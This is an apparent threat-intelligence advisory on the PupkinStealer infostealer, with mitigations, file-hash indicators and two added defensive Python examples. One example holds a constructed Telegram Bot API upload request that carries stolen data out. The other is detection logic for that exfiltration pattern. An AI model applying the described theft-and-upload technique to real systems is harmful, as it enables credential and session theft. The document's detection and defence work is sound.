PupkinStealer .NET Infostealer Using Telegram for Data Theft

Severity: Medium
Published: Thu May 22 2025 (05/22/2025, 13:09:11 UTC)
Source: AlienVault OTX General

Description

PupkinStealer is a newly identified .NET-based information stealer that harvests saved web browser passwords and application session tokens and exfiltrates them through Telegram. It targets Chromium-based browsers, Telegram and Discord, with the aim of credential theft and session hijacking. The malware performs minimal system discovery, collects files from the desktop and captures a screenshot, then packages everything into a ZIP archive and sends it to the attacker through Telegram's Bot API. It establishes no persistence, relying instead on quick execution and a low profile; its main evasion technique is the use of legitimate Telegram infrastructure as the exfiltration channel.

AI-Powered Analysis

Last updated: 05/22/2025, 15:54:15 UTC

Technical Analysis

PupkinStealer is a recently identified .NET-based information stealer that exfiltrates sensitive user data over legitimate Telegram infrastructure. It targets Chromium-based web browsers, Telegram and Discord, harvesting saved passwords and session tokens; a stolen session token lets the attacker resume the victim's already-authenticated session without knowing the password or completing MFA. The malware performs little reconnaissance and instead moves straight to collection: it gathers files from the desktop, captures a screenshot, and packages the loot into a ZIP archive, which it uploads to an attacker-controlled Telegram bot through the Bot API (HTTPS to api.telegram.org). Because the Bot API is reached over TLS, the archive contents are not visible to network inspection; the observable is the destination host and the process that made the connection. PupkinStealer implements no persistence, so its operational model is a single quick run rather than long-term presence on the host. Its primary evasion technique is blending in with traffic to a widely used, reputable service, which ordinary domain or reputation filters will not block. The medium severity rating reflects its ability to compromise credentials and sessions, which can lead to account takeover and data exposure. Since this is malware rather than an exploit for a software flaw, there is no CVE, patch or vulnerable version to track; it runs with whatever rights the victim has when the binary is executed, so the infection vector is delivery (social engineering or a similar lure) rather than a vulnerability in the targeted applications.
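To make the exfiltration channel concrete, the following added example (not code from this page, from the Picus write-up or from the malware) parses a constructed HTTP request of the kind a TLS-inspecting proxy or EDR would record when a stealer calls the Bot API's sendDocument method, and recovers the bot token, the chat_id the data is delivered to and the uploaded filename. The sample token and chat_id are fake, and the token length bounds in the regular expression are an assumption; the request layout (POST /bot<token>/<method> with a multipart body) follows the public Bot API.

```python
"""Recover indicators from a captured Telegram Bot API upload.

Added example; not code from the page, the Picus write-up or the malware.
It parses a constructed request of the shape a TLS-inspecting proxy or EDR
would record when a stealer calls sendDocument, and returns the bot token,
the chat_id the archive is sent to and the uploaded filename.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample request; the token and chat_id are fake indicators.
SAMPLE_REQUEST = (
    b"POST /bot7123456789:AAFakeTokenForIllustrationOnly0000000000/sendDocument HTTP/1.1\r\n"
    b"Host: api.telegram.org\r\n"
    b"Content-Type: multipart/form-data; boundary=----boundary42\r\n"
    b"\r\n"
    b"------boundary42\r\n"
    b'Content-Disposition: form-data; name="chat_id"\r\n'
    b"\r\n"
    b"123456789\r\n"
    b"------boundary42\r\n"
    b'Content-Disposition: form-data; name="document"; filename="report.zip"\r\n'
    b"Content-Type: application/zip\r\n"
    b"\r\n"
    b"PK\x03\x04...\r\n"
    b"------boundary42--\r\n"
)

# Bot tokens are "<numeric bot id>:<secret>". The length bounds are an
# assumption: loose enough for real tokens, tight enough to skip other paths.
REQUEST_LINE_RE = re.compile(
    rb"^POST /bot(\d{6,12}:[A-Za-z0-9_-]{30,})/(\w+) HTTP/1\.[01]$")


@dataclass
class BotApiIndicators:
    token: str             # full token; sensitive, it controls the bot
    method: str            # Bot API method, e.g. sendDocument
    chat_id: Optional[str]
    filename: Optional[str]

    @property
    def bot_id(self) -> str:
        """Numeric bot id, safe to put in a report unlike the full token."""
        return self.token.split(":", 1)[0]


def parse_bot_api_request(raw: bytes) -> Optional[BotApiIndicators]:
    """Return indicators if `raw` is a Bot API upload, otherwise None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    m = REQUEST_LINE_RE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if headers.get(b"host", b"").lower() != b"api.telegram.org":
        return None

    chat_id = filename = None
    bm = re.search(rb"boundary=([^;\s]+)", headers.get(b"content-type", b""))
    if bm:
        boundary = b"--" + bm.group(1)
        for part in body.split(boundary):
            part_head, _, part_body = part.partition(b"\r\n\r\n")
            # "; name=" avoids matching the "name=" inside "filename=".
            nm = re.search(rb';\s*name="([^"]+)"', part_head)
            if not nm:
                continue
            if nm.group(1) == b"chat_id":
                chat_id = part_body.strip().decode(errors="replace")
            elif nm.group(1) == b"document":
                fm = re.search(rb'filename="([^"]+)"', part_head)
                filename = fm.group(1).decode(errors="replace") if fm else None
    return BotApiIndicators(
        token=m.group(1).decode(), method=m.group(2).decode(),
        chat_id=chat_id, filename=filename)


if __name__ == "__main__":
    ind = parse_bot_api_request(SAMPLE_REQUEST)
    print(ind.method, ind.bot_id, ind.chat_id, ind.filename)
```

The recovered token is itself sensitive: whoever holds it can read and delete the bot's messages, so store it masked (the numeric bot id is enough for a report) and hand the full value only to whoever is handling takedown with Telegram.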

Potential Impact

For European organizations, PupkinStealer poses a risk primarily through credential theft and session hijacking, which can lead to unauthorized access to corporate and personal accounts. Given the widespread use of Chromium-based browsers and of Telegram and Discord across Europe, stolen credentials may also grant access to internal systems or cloud services and so enable lateral movement. Stolen session tokens are the more serious concern: they represent an already-authenticated session, so reusing them bypasses multi-factor authentication and produces no failed-login signal. The collection of desktop files and screenshots adds the risk of exposing intellectual property and confidential communications that happen to be open or stored on the desktop. Although PupkinStealer lacks persistence, its quick execution and its use of Telegram's infrastructure mean the data is usually gone before any remediation starts. Organizations with remote or hybrid workforces that rely on these applications are especially exposed, and sectors with high-value targets such as finance, government and critical infrastructure could see this malware used to gain an initial foothold. The medium severity rating reflects that the malware is not currently causing widespread disruption, while its capabilities still warrant proactive measures against credential compromise and data leakage.

Mitigation Recommendations

To mitigate the threat posed by PupkinStealer, European organizations should implement targeted controls beyond generic cybersecurity hygiene. First, remove the primary target: disable browser-saved passwords by policy (Chrome and other Chromium browsers expose a PasswordManagerEnabled enterprise policy) and issue an enterprise password manager instead, and on any suspected infection reset the affected passwords and revoke active sessions immediately rather than relying on scheduled rotation. Deploy endpoint detection and response (EDR) capable of correlating process behaviour, in particular a process that writes a ZIP archive under the user profile and then connects to api.telegram.org, the host behind Telegram's Bot API. On the network, treat outbound HTTPS to api.telegram.org as noteworthy: the Bot API is meant for bots, not for the Telegram desktop client, so on endpoints with no legitimate bot integration it can be blocked at the proxy or at least alerted on. Apply application control to block unsigned .NET binaries and scripts executing from user-writable locations such as Downloads and Temp. Educate users on the risks of downloading and executing unknown files, particularly those purporting to be related to messaging apps or browser extensions. Keep multi-factor authentication, but recognize that stolen session tokens bypass it; complement it with short session lifetimes, risk-based re-authentication and the ability to revoke sessions centrally. Discourage storing sensitive documents on the desktop, since the malware collects that location wholesale; such files belong in managed, access-controlled storage. Finally, maintain updated threat intelligence feeds and load the indicators of compromise (IOCs), such as the MD5, SHA-1 and SHA-256 file hashes listed below, into security tooling to enable rapid detection and response.
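The EDR correlation described above, as an added example that is not part of this page, AlienVault's pulse or any vendor's detection content: it runs over constructed endpoint telemetry (one JSON object per line, loosely modelled on Sysmon FileCreate and NetworkConnect events; the field names, the allowlisted path and the 120-second window are assumptions) and raises a high-severity alert when the same process writes a .zip under a user profile and then connects to api.telegram.org within the window, and a medium-severity alert for any other Bot API connection from a process that is not allowlisted.

```python
"""Correlate ZIP staging with a Telegram Bot API connection on an endpoint.

Added example; not the page's, AlienVault's or Picus's detection content.
Field names, the allowlist and the window are assumptions for illustration.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

BOT_API_HOST = "api.telegram.org"
WINDOW = timedelta(seconds=120)
# Lower-cased image paths that legitimately call the Bot API (assumption).
ALLOWLIST = {r"c:\program files\ops\bot-bridge.exe"}

# Constructed sample telemetry, one JSON event per line, UTC timestamps.
SAMPLE_EVENTS = r"""
{"ts":"2025-05-22T13:00:01Z","event":"FileCreate","pid":4120,"image":"C:\\Users\\alice\\Downloads\\invoice.exe","target":"C:\\Users\\alice\\AppData\\Local\\Temp\\a.zip"}
{"ts":"2025-05-22T13:00:03Z","event":"NetworkConnect","pid":4120,"image":"C:\\Users\\alice\\Downloads\\invoice.exe","dest_host":"api.telegram.org","dest_port":443}
{"ts":"2025-05-22T13:05:00Z","event":"FileCreate","pid":5001,"image":"C:\\Windows\\explorer.exe","target":"C:\\Users\\bob\\Desktop\\photos.zip"}
{"ts":"2025-05-22T13:06:00Z","event":"NetworkConnect","pid":7777,"image":"C:\\Program Files\\ops\\bot-bridge.exe","dest_host":"api.telegram.org","dest_port":443}
{"ts":"2025-05-22T13:10:00Z","event":"NetworkConnect","pid":8080,"image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_host":"web.telegram.org","dest_port":443}
{"ts":"2025-05-22T13:20:00Z","event":"FileCreate","pid":9000,"image":"C:\\Users\\carol\\AppData\\Local\\Temp\\tool.exe","target":"C:\\Users\\carol\\AppData\\Local\\Temp\\b.zip"}
{"ts":"2025-05-22T13:30:00Z","event":"NetworkConnect","pid":9000,"image":"C:\\Users\\carol\\AppData\\Local\\Temp\\tool.exe","dest_host":"api.telegram.org","dest_port":443}
"""


def parse_events(text):
    """Parse JSON-lines telemetry and return events sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def is_user_archive(path):
    """True for a .zip written anywhere under a user profile."""
    p = path.lower()
    return p.endswith(".zip") and "\\users\\" in p


def correlate(events):
    """Return alerts for Bot API connections, escalated when preceded by ZIP staging."""
    staged = defaultdict(list)   # (pid, image) -> [(ts, zip path), ...]
    alerts = []
    for ev in events:
        key = (ev["pid"], ev["image"].lower())
        if ev["event"] == "FileCreate":
            if is_user_archive(ev["target"]):
                staged[key].append((ev["ts"], ev["target"]))
        elif ev["event"] == "NetworkConnect":
            if ev.get("dest_host", "").lower() != BOT_API_HOST:
                continue
            if key[1] in ALLOWLIST:
                continue
            # Events are time-ordered, so every staged ZIP predates this connection.
            archives = [p for t, p in staged[key] if ev["ts"] - t <= WINDOW]
            alerts.append({
                "severity": "high" if archives else "medium",
                "ts": ev["ts"].isoformat(),
                "pid": ev["pid"],
                "image": ev["image"],
                "archives": archives,
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

In a real deployment the destination hostname is the weak link: Sysmon's NetworkConnect event only carries DestinationHostname when a reverse lookup succeeds, so join the connection against DNS query events (Sysmon Event ID 22) or the proxy log instead of trusting the field as shown here.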


Technical Details

Author: AlienVault
TLP: white
References: https://www.picussecurity.com/resource/blog/pupkinstealer-net-infostealer-using-telegram-for-data-theft
Pulse Id: 682f21f740ee536b48e48783

Indicators of Compromise

File hashes (algorithm inferred from digest length)

MD5: fc99a7ef8d7a2028ce73bf42d3a95bce
SHA-1: 84dd5bc96170c98ad1d1ec90e8f09ec99e6dc9db
SHA-256: 9309003c245f94ba4ee52098dadbaa0d0a4d83b423d76c1bfc082a1c29e0b95f

Threat ID: 682f36850acd01a2492610f4

Added to database: 5/22/2025, 2:36:53 PM

Last enriched: 5/22/2025, 3:54:15 PM

Last updated: 6/15/2025, 10:53:55 AM
